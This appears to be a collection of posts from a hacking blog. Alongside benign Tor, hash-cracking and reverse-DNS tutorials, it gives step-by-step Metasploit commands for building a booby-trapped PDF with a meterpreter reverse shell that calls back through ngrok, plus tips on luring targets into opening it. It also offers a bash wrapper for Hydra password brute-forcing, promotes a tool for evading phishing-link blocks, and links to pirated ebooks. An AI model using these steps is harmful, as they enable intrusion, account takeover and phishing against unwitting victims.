Tuesday, November 5, 2019

How to create a Tor SSL hidden service - Termux

Hello ladies and gentlemen, boys and girls, to tonight’s show. I will be your host. Now, let me explain to you how to create a Tor hidden service, and as a bonus, I will teach you how to set SSL to it to encrypt the connection. Enough of the bullshit, let’s roll.

Now, you will need a LOT. As always, the requirements must meet in order for it to be successful:

Packages
nginx: to deploy the web server.
tor: to act both as a proxy and a hidden service provider.
openssl to generate a self-signed SSL certificate.

Others
The Tor browser to check if your results are responsive.

Done. Now to the actions.
First of all, you gotta have to generate your SSL certificate and private key. Keep both of this in a safe and secluded directory. Use this set of commands in the correct order:

$ openssl req -x509 -newkey rsa:16384 -keyout certkey.pem -out cert.csr -days 365 -verify -set_serial 740340178739478 -sha512

$ mv certkey.pem /data/data/com.termux/files/usr/etc/nginx/

$ mv cert.csr /data/data/com.termux/files/usr/etc/nginx/

The next thing you wanna do is to go to the nginx config file and edit it with the command:
$ nano /data/data/com.termux/files/usr/etc/nginx/nginx.conf

Then, uncomment everything from line 98 to the end (HTTPS server section). Next, modify it as I say.


# HTTPS server
#
server {
listen 8443 ssl;
server_name localhost;

ssl_certificate /data/data/com.termux/files/usr/etc/nginx/cert.csr;
ssl_certificate_key /data/data/com.termux/files/usr/etc/nginx/certkey.pem;

ssl_session_cache shared:SSL:1m;
ssl_session_timeout 5m;

ssl_ciphers HIGH:!aNULL:!MD5;
ssl_prefer_server_ciphers on;

location / {
root share/nginx/html;
index index.html index.htm;
}
}

}

Next, you configure Tor to do what you want. Use the command:
$ nano /data/data/com.termux/files/usr/etc/tor/torrc

Now, locate the section where it says hidden service and modify it as I say:

############### This section is just for location-hidden services ###
## Once you have configured a hidden service, you can look at the
## contents of the file ".../hidden_service/hostname" for the address
## to tell people.
##
## HiddenServicePort x y:z says to redirect requests on port x to the
## address y:z.

HiddenServiceDir /data/data/com.termux/files/usr/var/lib/tor/hidden_service/
HiddenServicePort 443 127.0.0.1:8443

#HiddenServiceDir /data/data/com.termux/files/usr/var/lib/tor/other_hidden_service/
#HiddenServicePort 80 127.0.0.1:80
#HiddenServicePort 22 127.0.0.1:22

Now, you gotta create a directory at the specified place. Use these command in the specific order:

$ cd /data/data/com.termux/files/usr/var/lib/
$ mkdir -p tor/hidden_service/

Now the configuration is pretty much done. You just gotta do these last commands:

$ nginx
$ tor

Wait for it to finish, then use this command:
$ cat /data/data/com.termux/files/usr/var/lib/tor/hidden_service/hostname
Copy that into your clipboard.

Last step: Paste the .onion link into the Tor browser I asked you to install. You’re done here.

I hope you enjoy this tutorial. If you find it helpful, why not share it around. Always remember, Hackingarise is never responsible for any of your malicious acts. Have a nice night. Stay safe, stay ethical.

Saturday, November 2, 2019

dehash: Hash decryptor - by IRISnoir

Good evening, lads and lassies. This is IRISnoir from Hackingarise. Bringing to you today’s post: about dehash. A tool made by me.

This tool is a hash decryptor that supports 12 hash types. This includes:
Blake2B
Blake2S
MD5
SHA1
SHA224
SHA256
SHA384
SHA512
SHA3-224
SHA3-256
SHA3-384
SHA3-512

The requirements are:
git to clone the repository to the system
python to run the file
A wordlist file to crack the hash

That’s about it. You just need to ready the hash, and you’re good to go.
Here is the github link.
https://github.com/IRISnoir/dehash

I hope you find it useful for your task. Please share this post around. Always remember, Hackingarise is never responsible for any of your malicious acts. Thank you for reading. Stay safe, stay ethical.

Saturday, October 26, 2019

How to reverse DNS in Termux

Hi everyone, this is the Termux Hacker of Hackingarise, it’s me, IRISnoir. Bringing another tutorial to you to help with your pentesting skills. Now I will get straight into it, today’s topic will be about… rDNS!

Now I know some of you are asking: What is rDNS?
Answer – I will put this short. Reverse DNS (rDNS) is the opposite of Forward DNS. Forward DNS will peel the domain name to look for its IP (e.g.: hackingarise.com → 172.104.140.148). But Reverse DNS will peel the IP to look for the domain name (e.g.: 172.104.140.148 → hackingarise.com).

The requirements for the procedure are:
dnsutils: A package in Termux containing a set of DNS related commands. Install that.

And that’s about it.

What you wanna do is to obtain an IP (I will use Hackingarise site as an example: 172.104.140.148). Then, to perform rDNS on the Hackingarise site, execute this:
dig -x 172.104.140.148
You can replace the IP with something else. This is merely an example.

Now, it should display this:

; <<>> DiG 9.14.6 <<>> -x 172.104.140.148
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 29091;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 4096;; QUESTION SECTION:;148.140.104.172.in-addr.arpa. IN PTR;; ANSWER SECTION:148.140.104.172.in-addr.arpa. 86385 IN PTR server.xpandity.com.;; Query time: 18 msec;; SERVER: 8.8.8.8#53(8.8.8.8);; WHEN: Tue Oct 29 18:26:28 ICT 2019;; MSG SIZE rcvd: 90

At the line where it says 'ANSWER SECTION', it will say something like 'server.xpandity.com'. This is your target.
The reason for it to display this is because Hackingarise is using server.xpandity.com as a domain.

I hope you enjoy this tutorial. If you do, please share it around. Also make sure what you are doing won't cause any trouble as Hackingarise won't be responsible for anything you get into. Thank you, stay safe, stay ethical.

Thursday, October 24, 2019

Hands-On Penetration Testing with Kali NetHunter

Welcome to hacking a rise today we got a treat for you all hands on pentesting with nethunter what can i say to this only i use nethunter more my laptop lol i love the rom so lets start with the book 🙂

About

Kali Nethunter is version of the popular and powerful Kali Linux pentesting platform, but designed to be installed on mobile devices. In this book, you will learn the components of Nethunter, how to install the software, the different tools included and how to optimize and use the package to get the results that you need to carry out your tests and make you environment more secure.

Starting with an introduction to Kali Nethunter, you will delve into the different phases of the pentesting process. This book will also show you how to build your penetration testing environment and set up your lab. You will be able to gather intellectual data and exploit vulnerable areas and gain control over target system. You will also learn about the Nethunter tools available for exploiting wireless and wireless devices. The book will then show you new ways to deploy existing tools in new ways designed to reduce the chances of detection. Lastly, you will also discover some tips and best practices on integrating security hardening into your Android ecosystem. By the end of this book, you will know how to successfully use a mobile penetration testing device based on Kali Nethunter and Android to accomplish the same tasks you would traditionally, but in a smaller and more mobile form factor.

Features

A practical guide to getting you up and running with a Kali Linux NetHunter
Connect your Android device and gain full control over Windows/OSX/Linux devices
Crack Wi-Fi password and gain access to devices connected over the same network collecting intellectual data
Page Count 302
Course Length 9 hours 3 minutes
ISBN 9781788995177
Date Of Publication 28 Feb 2019

tables of contents

  • 1:Introduction to Kali NetHunter
    2:Understanding the Phases of the Pentesting Process
    3:Intelligence-Gathering Tools
    4:Scanning and Enumeration Tools
    5Penetrating the Target
    6:Clearing Tracks and Removing Evidence from a Target
    7:Packet Sniffing and Traffic Analysis
    8:Targeting Wireless Devices and Networks
    9:Avoiding Detection
    10LHardening Techniques and Countermeasures
    11:Building a Lab
    12:Selecting a Kali Device and Hardware
  • Authors

    Sean-Philip Oriyano
    Sean-Philip Oriyano is a long-time security professional. Over the past 25 years, he has divided his time between performing security research, consulting, and delivering training in the fields of both general IT and cyber security. He is also a best-selling author with many years’ experience in both digital and print media. Sean has published several books over the past decade and has expanded his reach further by appearing on TV and radio shows. Additionally, Sean is a chief warrant officer (CWO) and unit commander specializing in cyber security training, development, and strategy. As a CWO, he is recognized as an SME in his field and is frequently called upon to provide expertise, training, and mentoring wherever needed.

    Glen D. Singh
    Glen D. Singh is a cyber security instructor, consultant, entrepreneur, and public speaker. He has been conducting multiple training exercises in offensive security, digital forensics, network security, enterprise networking, and IT service management on an annual basis. He also holds various information security certifications, including the EC-Council’s Certified Ethical Hacker (CEH), Computer Hacking Forensic Investigator (CHFI), Cisco’s CCNA Security, and CCNA Cyber Ops, as well as many others, in the field of network security. Glen has been recognized for his passion and expertise by both public and private sector organizations at home, in Trinidad and Tobago, and abroad.

    Disclaimer

    The contributor(s) cannot be held responsible for any misuse of the data. This repository is just a collection of URLs to download eBooks for free. Download the eBooks at your own risks.

    DMCA take down cannot be possible as we are not republishing the books/infringement of code, but we are just hosting the links to 3rd party websites where these books can be downloaded.

    DOWNLOAD HERE

    Saturday, October 19, 2019

    Hack a pc with pdf using msfconsole

    Welcome back to hacking a rise i am the laughing man the one and only laughing man i am him whoop whoop so in this post we will be showing you now to take over a pc with a pdf file there is a load ways we can do this but im going to show you the most simple was with msfconsole on kali linux or parrot you know what any linux system with metasploit installed lol all the commands in msfconsole are the same so fuck it lets start

    What is metasploit

    The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. It is owned by Boston, Massachusetts-based security company Rapid7

    find out more here

    how to perform the hack

    Right lad and gals to start the hack i will be using ngrok for forward my ports via ssh you can get ngrok free by download it of there site
    ngrok download here

    so first of all we need to stat postgresql services you can do this by typing in terminal service postgresql start
    Hacking A Rise servicepoststartpdf-1024x752

    now we can start ngrok to run on tcp so in terminal type ./ngrok tcp 4444 this will open the port 4444 for are payload to connect on
    Hacking A Rise ngroktcp4444

    Hacking A Rise ngroktcp4441

    as u see the port is now open if you dont wanna use ngrok we have serveo or forward the ports via router follow this link https://www.lifewire.com/how-to-port-forward-4163829

    Now we are ready to start msfconsole so open a new terminal and leave the one with ngrok open if u are using ngrok or serveo starting msfconsole may take some time depending on your system
    Hacking A Rise msfconsolepdf-1024x755

    as u see its loaded
    Hacking A Rise msfconsolepdf1-1024x589

    now we type search type:exploit platform:windows adobe pdf if you dont know the command to use the exploit
    Hacking A Rise msfconsloepdf2-1024x533
    there a lot i know

    as i use the exploit 100 times before i can just type exploit/windows/fileformat/adobe_pdf_embedded_exe and press y to let it load as i always forget to put use before the exploit lol
    Hacking A Rise msfpdf1-1024x86

    now we type show options this will show use what input we need to add for this to work annd here we will set the name the pdf file and the payload that we will be using so type out this set FILENAME ELITEHACKINGGUIDE.PDF so now we type show options agen to see whats next
    now we type set PAYLOAD windows/meterpreter/reverse_tcp
    Hacking A Rise setthenameandpayload-1024x323

    now we need to set the lhost and the lport for the payload to connect back to so we type set LHOST 0.tcp.ngrok.io and the LPORT 17140 as u see im using the link and port ngrok gave us for opening port 4444 (note you can add the serveo link or your ip in to the lhost and the port you have open )
    Hacking A Rise msfconsole23-1024x152

    now for the fun type exploit or run
    Hacking A Rise msfconsoleexploitpdf
    as u see the file is saves in .msf4 file

    Hacking A Rise msf4file

    how to get target to download pdf

    There are many of ways we can get are target to download the file like beef-xss,man in the middle,upload it to a file hosting site or make a fake site and run it of your pc/laptop or phone to lure the target to download it social engineering is key in this sort of attack then agen most attacks we need good SE skills as we dont want the target to know we are hacking them but saying that we can embed the payload to a pdf file we got online by typing set INFILENAME /root/Documents/hackingpdfs/web-hacking-101.pdf
    Hacking A Rise change-pf-1024x191

    compared to the first pdf we used we now have it looking more like a real pdf file
    Hacking A Rise Screenshot-from-2019-10-19-21-30-26

    now we need to start the handler for the payload so type this

    use exploit/multi/handler
    show options
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 0.tcp.ngrok.io
    set LPORT 17140

    Hacking A Rise sethandler-1024x812

    now all we have to do is get the target to download the pdf and boom we have them hahahahaha i dont got a windows laptop here so i cant show you it connected and im not going to get some to download it after all we are white hats now black hats lol

    DISCLAMER

    This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The Authors and https://hackingarise.com will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law

    How to modify Hydra to perform bruteforce without a file (Bash)

    Hello, this is IRISnoir from Hackingarise. The Termux Hacker. I am here with another tutorial. This time, I will help you with Hydra.

    If you don’t know how to use Hydra or what Hydra even is, then it is recommended that you read this article.

    Have you ever tried activating Crunch or download a wordlist but then you see the size of it. So you go and check the storage and you go:
    – HA HA Ha ha, what is the size again?

    So I got a good solution to that. I have crafted it with Bash so that you can automate it. The only thing required is patience and sometimes modification.

    You only need: crunch and hydra.

    Here is the piece of code:

    crydra () {
    read -p 'Crunch: starting length: ' start
    read -p 'Crunch: ending length: ' end
    read -p 'Hydra: server specification (example: ssh://127.0.0.1:8022): ' server
    read -p 'Hydra: login specification: ' login
    wl=$( crunch "$start" "$end" 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789' )
    for password in ${wl[@]}
    do
    hydra -l "$login" -p "$password" -e nsr -v -V -O -o crack.txt "$server"
    done
    }

    Just copy and paste this casually into your terminal.
    Or, if you wanna have it ready every time you load up your terminal, append it to the bash.bashrc file.

    Then, you just need to run the command:
    crydra

    I hope you enjoy this tutorial. If you do, please share around. Also, make sure what you are doing is completely ethical and legal as Hackingarise is never responsible for any trouble you get into. Thank you, stay safe, stay ethical.

    Picsee has blocked serveo and ngrok links fix

    welcome lads and gals this post a bit different than what i mostly post on here but its been at me a wile now and i just had to see if i can do something about it so we all know picsee as a lot hackers use it in phishing it lets you edit the thumbnail of a url the thumbnail is the little box pops up when you share a link on a site so since like a few months ago they after blocking ngrok and serveo links witch is balls for us or is it lol anyways i mead a link shortener with this link shortener we can use it to change the link on picsee.co instead me typeing it all out i decided make a video 🙂 so enjoy
    linking-it.freesite.vip
    Picsee.co